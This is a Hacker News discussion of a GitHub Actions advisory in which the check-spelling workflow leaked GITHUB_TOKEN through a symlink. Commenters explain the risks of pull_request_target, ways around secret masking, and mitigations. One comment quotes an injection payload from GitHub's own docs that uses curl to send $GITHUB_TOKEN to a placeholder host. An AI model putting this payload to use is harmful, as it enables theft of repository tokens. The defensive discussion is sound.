Hacker News new | past | comments | ask | show | jobs | submit login
GitHub Actions checkspelling community workflow GitHub_TOKEN leakage via symlink (github.com/justinsteven)
129 points by pentestercrab on Sept 9, 2021 | hide | past | favorite | 35 comments



I don't know why it hasn't occurred to me as a problem before, but branches/PRs can also modify the workflow, and their build runs the new modified workflow... I must be missing something, because that seems to make it way worse, forget symlinks and project-specific vulns, just print the env? Has modifying the workflow on a 'PR branch' only worked for me because I've been the repo owner perhaps?

Edit to add: I think what I'm missing (haven't fully understood yet, just thought should share) is the importance here of the 'pull_request_target' event type used. The docs carry a warning:

> Warning: The pull_request_target event is granted a read/write repository token and can access secrets, even when it is triggered from a fork. Although the workflow runs in the context of the base of the pull request, you should make sure that you do not check out, build, or run untrusted code from the pull request with this event. Additionally, any caches share the same scope as the base branch, and to help prevent cache poisoning, you should not save the cache if there is a possibility that the cache contents were altered. For more information, see "Keeping your GitHub Actions and workflows secure: Preventing pwn requests" on the GitHub Security Lab website.

https://docs.github.com/en/actions/reference/events-that-tri...


There's an important distinction between "privileged" and "unprivileged" Workflow Runs, and the context within which a Workflow is executed.

Let's imagine there's a repository containing a Workflow (on the branch) that listens to the `push` event and then outputs the value of `secrets.API_KEY`:

* A collaborator pushes: Workflow Run is privileged -> the value of `secrets.API_KEY` is output

* A non-collaborator pushes: Workflow Run is unprivileged -> no value is output

The `pull_request_target` event type comes into play when you need a privileged Workflow Run to execute when a non-collaborator performs an action. For security, `pull_request_target` events are only triggered against a Workflow on the primary repository branch, a non-collaborator cannot sneak a `pull_request_target` into their Pull Request. Essentially, `pull_request_target` in a Workflow on your main branch is "listening" for Pull Requests.

There is no risk using `pull_request_target` if you do not execute any code from the Pull Request within a privileged Workflow. If you execute code from the Pull Request within a privileged Workflow, then you're definitely exposed to a lot of serious problems.

* An unprivileged Workflow Run should... build artifacts, execute tests, upload artifacts to the Workflow Run

* A privileged Workflow Run should... download artifacts from the unprivileged Workflow Run, publish artifacts to storage

> Has modifying the workflow on a 'PR branch' only worked for me because I've been the repo owner perhaps?

Every time you execute a Workflow as a repository owner, it is privileged and can do anything. For example, your Pull Request Workflow Run can access secrets (so you might think that _all_ Pull Requests can access secrets) but in reality, a Pull Request from a non-collaborator cannot.

Does that help clarify? The security model of GitHub Actions has changed over the last year, so it's not completely intuitive if your frame of reference is from before the changes. I highly recommend the GitHub Security blog articles, they're very illuminating.


Travis followed this basic model years ago also, though I don't know if they were explicit about the privileged/unprivileged; it was more just no secrets added to the environment for PRs from unknown forks.


> forget symlinks and project-specific vulns, just print the env?

GitHub masks anything that is a secret (or the github token) when it shows up in the log. You'll see stars ** instead of the actual secret.

However, this is trivially worked-around - apply a caesar cipher to it or simply add a space between each character. It would also be super simple to ship the token to a remote server with curl, as GitHub notes in its security hardening document[0]:

> they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example:

  a"; set +e; curl http://example.lab?token=$GITHUB_TOKEN;#.
0: https://docs.github.com/en/actions/learn-github-actions/secu...


Whenever I see ** instead of a password I have a laugh because I know the secret is hunter12.


Sure, it was just a succinct way to make the point, since as you say and others are commenting on, it's trivially worked around (in any CI system) if you're trying - it's only really supposed to stop accidental leaks.


This is every CI system on the planet

  echo ${PASSWORD} > file; cat file
And your password is now in the log file unmasked.


No, it masks the output stream by searching for all secrets and censoring them.


how does it know what are secrets? what if I base64 the password before printing it?


Thats what was said, it cannot detect that. If you rot13 it, you bypassed the protection.


If the PR is from a fork, then a repository maintainer needs to approve it. By default this is for first-time contributors, but is configurable https://docs.github.com/en/actions/managing-workflow-runs/ap...

NB: I've never played with configuring it.


Ah yes, new in April: https://github.blog/2021-04-22-github-actions-update-helping...

I can't find anything on configuring it though, that only mentions for first-time contributors as you say. I have a 'contributor' badge for pretty minor contributions to all sorts of projects, doesn't necessarily mean they should trust me any more than a first-time contributor! (I can be trusted! I just don't think my contribution to some of them is too much of a barrier for a malicious actor...)


https://docs.github.com/en/github/administering-a-repository... contains details for configuring it on a repository basis. Looks like you can require it for new github accounts XOR first time contributors XOR all forks.

It's also configurable at the organisation and enterprise level, if those are relvent to anyone.

Organization settings: https://docs.github.com/en/organizations/managing-organizati... Enterprise settings: https://docs.github.com/en/github/setting-up-and-managing-yo...


The more I've used Actions, the more I have come to two conclusions:

1) It's generally better to just do things with legacy tooling and your own scripts, than it is to pull in community actions

2) GitHub badly needs to implement tightly scoped tokens. GITHUB_TOKEN has a completely fixed and unmodifiable scope, and if you need to give a workflow an OAuth token to perform some other operation, your only choice is to give it a full read-write token for all of the repositories the token's user can access. You can't even scope a token to a single repo, let alone make one that's read-only, or limited to, say, commenting.



GP, and I agree, wants tokens to be scoped to repos, not to activities.

Your link describes how you can limit the things you can do with a token. But GitHub doesn’t allow limiting where you can do those things.

It’s annoying and I wish they would fix this. If you work on lots of repos across lots of orgs, this is a big vulnerability. I get the heebee-jeebies whenever I have to grant permission on something because if I make a mistake it could hose lots of things.


I was under the impression that the default temporary GITHUB_TOKEN for forked repos (which is what happens with PRs) were read-only. Isn't that the case?

https://docs.github.com/en/actions/reference/authentication-...


It is. As far as I'm aware issues like these are only problematic if you either manually run a workflow (it uses your credentials) or have a workflow with the "pull_request_target" trigger (uses a token with write access). The latter has a plethora of potential pitfalls and should be avoided if you can.


Indeed, pull_request_target should be avoided.

The better model to use here is "pull_request" to do the work of building/testing a PR, and then a separate workflow that triggers on "workflow_run" to collect the results and attach them to the PR.

It's really not a lot of fun to implement though :/


Github badly need to add an abstraction for passing an artifact between workflows. The official recommendation for how to use workflow_run is comically messy (20+ lines of javascript-in-yaml because actions/download-artifact doesn't support fetching artifacts across repos):

https://securitylab.github.com/research/github-actions-preve...

Kinda hard to expect average users to grok this, running a follow-up workflow in a secure context with some carried over artifacts should be trivial to do declaratively.


I wonder if GH could/should make it a lot more convenient to implement with some additional abstractions, to encourage the secure approach by making it as easy as the insecure one.


This is super interesting; we had a fairly long discussion about whether or not to add this action to cert-manager[1], and ended up rejecting it in part because it increased the risk of supply-chain attacks and that risk wasn't, in our opinion, outweighed by the potential benefit of catching more spelling mistakes.[2]

For me, I think there's a wider point here that GitHub Actions are pretty scary in terms of these kinds of attacks. Pre-packaged actions are easy to add to a project but come with risks, as this security advisory shows! There are a few aspects to Actions which made me a little uneasy in terms of my threat models when building software, and personally I've tended to avoid them.

[1] https://github.com/jetstack/cert-manager (Full disclosure, I'm part of the team paid by Jetstack to work on the cert-manager project)

[2] https://github.com/jetstack/cert-manager/pull/3863#issuecomm...


It feels kind of absurd to me that symlinks like this work by default in workflows, if at all. The symlink being able to point outside of the source tree is even worse. Github should be scrubbing anything like this from PRs at a minimum. The only use cases for this stuff I can think of are either absurdly low-quality code (a security risk you absolutely don't want to accept), or attacks.


I've always been a bit vary of running stuff automatically on PRs from untrusted persons. How easy is it to exploit? If my repo always runs all tests on a PR, could someone just add a PR with a new test that is then run? Thus running their arbitrary code.


You are wise to be wary.

There are some pretty subtle tigers waiting to maul you if you run workflows against untrusted PRs.

The way I currently do this is that our workflows run the CI build/test job in the repo of the user proposing the PR and uploads the logs/results as an "Artifact". Our repo waits for that job to complete and then downloads the artifacts and produces a pretty comment with the junit test results on the PR.

However, despite recommending a model like this, GitHub still makes it infuriatingly hard to actually do, and we ended up with all of this crud to be able to get one XML file: https://github.com/Hammerspoon/hammerspoon/blob/master/.gith...


> If my repo always runs all tests on a PR, could someone just add a PR with a new test that is then run? Thus running their arbitrary code.

Running arbitrary code is inevitable if an action is configured to run on all PRs. People have abused this to run crypto miners and stuff in the past, but this for the most part is merely an annoyance to maintainers, not a security problem. It does become a security problem when arbitrary code execution is allowed with your secrets, including your configured secrets and the read/write GITHUB_TOKEN.

Expanding on the topic of secrets, if you trigger your test from the usual pull_request event, the workflow won't have access to GITHUB_TOKEN or configured secrets, so it's the safe default you should almost always choose. That becomes a problem when you need write access to the repo, e.g. to assign labels or add comments to the PR from the workflow, in which case you have to use the privileged pull_request_target event to expose GITHUB_TOKEN and secrets. pull_request_target by default runs in the context of the base of the PR, so there's still no arbitrary code, but you can explicitly check out the PR in that context, and when you do, your secrets are potentially exposed to arbitrary code. If you execute that arbitrary code in any job, or like in this case, post the content of effectively any file on disk as directed by an attacker, boom, owned.

Therefore, you should

- Avoid pull_request_target unless white access to the repo and/or access to configured secrets is absolutely necessary;

- When using pull_request_target, avoid checking out untrusted code;

- If it's absolutely necessary to check out untrusted code, make absolutely sure that the untrusted code isn't executed in any way, and that your trusted handling code can't be tricked by untrusted content in any way, like an arbitrary symlink. This is of course difficult to verify.

In this specific case, the fix seems to be checking that the absolute path of the untrusted advice.txt is within GITHUB_WORKSPACE (https://github.com/check-spelling/check-spelling/commit/4363...). IMO that's a wrong fix only covering up the symptom. The real cause is using untrusted configuration files at all; why not make a copy of the trusted version of configuration files and use those instead???

GitHub has an article about security considerations here: https://securitylab.github.com/research/github-actions-preve...


Do spelling checks like this one provide valuable feedback for anyone?

I always found they required constant configuration to handle regional language and false positives on valid programming terms.


In my experience, not really. It reminds me of another build-time check that I've seen which crawls material looking for broken (non-200) links.

Unfortunately, if you link to a single site too often, it'll hit rate limits and start to think links are broken, breaking the entire build process over a non-issue.

It runs slightly contrary to another value I hold that is "anything that can be enforced by a machine should be enforced by a machine", but when it starts to introduce security or other issues that impact velocity, it stops being a good check.


> Importantly, you must do this for every open branch in your repo. It is not enough to do so for only your default branch since a malicious PR can target any of your open branches. That is, if you have an open branch that uses a vulnerable version of check-spelling then a malicious PR targeting that branch can leak a GITHUB_TOKEN which can then be used to impact any of your branches, including your default branch.

I think this is a big design flaw in GitHub Actions. Whenever there is a security patch, you have to make sure to apply them in every branch. This includes all the historical branches and stale branches which the repo owners forget to delete.


Hard to follow this because I'm mostly on the consuming end of CIs or occasionally do some basic things. Although I've recently tried GHA, setting it up from scratch even for complex setups seems almost trivial. But the security of GHA seems more than shaky.

> I think this is a big design flaw in GitHub Actions. Whenever there is a security patch, you have to make sure to apply them in every branch.

On the other hand I think every action needs to be initialized once on the main branch.


If it’s pulling the actions from git using a fixed commit, then a workaround could be to break history from before the vuln was introduced then it wouldn’t be possible to pull the vulnerable actions. GitHub does GC the unreachable commits quite aggressively.


Note -- if you're running Github Actions on your local machine, run it in a VM. You can use something like multipass[0] which is pretty light (Ubuntu is heavy of course, but is the expected OS of most setup documentation).

While working on a project of mine that runs runners (Github, GitLab and others), how to safely run other people's random workloads and not become a botnet/crypto miner was basically the only hard technical challenge. GitLab is farther ahead in terms of runner sophistication (and also options available to you when self hosting) by a long shot.

[0]: https://multipass.run/docs


So, I get really confused by Github permissions model; I know that sometimes I am forced to give something access to all of my repos when I really only want it to act on one.

Does this affect the leaked GITHUB_TOKEN, what would that token give a posessor access to, what's the scope? Just one repo, or many?

If the token gives access to, say, every repo that the user who authorized it has access to, this makes the scope of any vulnerability even worse. And vulnerabilities, like bugs, will always happen.

I've been wondering for a while how github gets away with such poor scoping of it's auth without more outcry/demand. And figured that maybe it would take an exersized vulnerability to bring attention to it.


GITHUB_TOKEN is scoped to a single repo.


Probably this info is reflected somewhere in the document (my bad), but is there any specific insight that we can learn for the code we write to avoid similar issues?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: